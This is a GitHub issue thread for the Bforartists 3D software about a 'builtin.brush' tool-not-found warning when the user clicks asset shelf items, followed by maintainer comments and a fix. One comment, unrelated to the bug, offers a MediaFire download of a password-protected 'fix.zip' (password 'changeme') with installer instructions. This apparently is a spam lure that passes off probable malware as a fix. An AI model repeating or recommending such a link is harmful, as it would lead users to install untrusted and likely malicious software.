### ISSUE TITLE
Asset Shelf Warning

### ISSUE THREAD

**Issue by hitkeydel** [Bforartists/Bforartists#4603]
**Describe the bug**
Tool 'builtin.brush' not found for space 'VIEW_3D'
1. Click on any item from the asset shelf

**Desktop (please complete the following information):**
win10, gtx1060 

**Screenshots, Example Files**
File attached.
[test.zip](https://github.com/user-attachments/files/16776338/test.zip)

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ReinerBforartists** [comment]
Many thanks for the report @hitkeydel 

Hm. Not to reproduce here. @Draise, you konw the brush system better than me. Ideas?

**Comment by Draise14** [comment]
Can reproduce. Working it.

**Comment by Draise14** [comment]
Added in a poll to make sure it is only in object mode, or else.. don't show (allowing to show the other asset shelves without a conflict) This panel is not a brush asset shelf, so it needed to be self contained in the View 3D space.
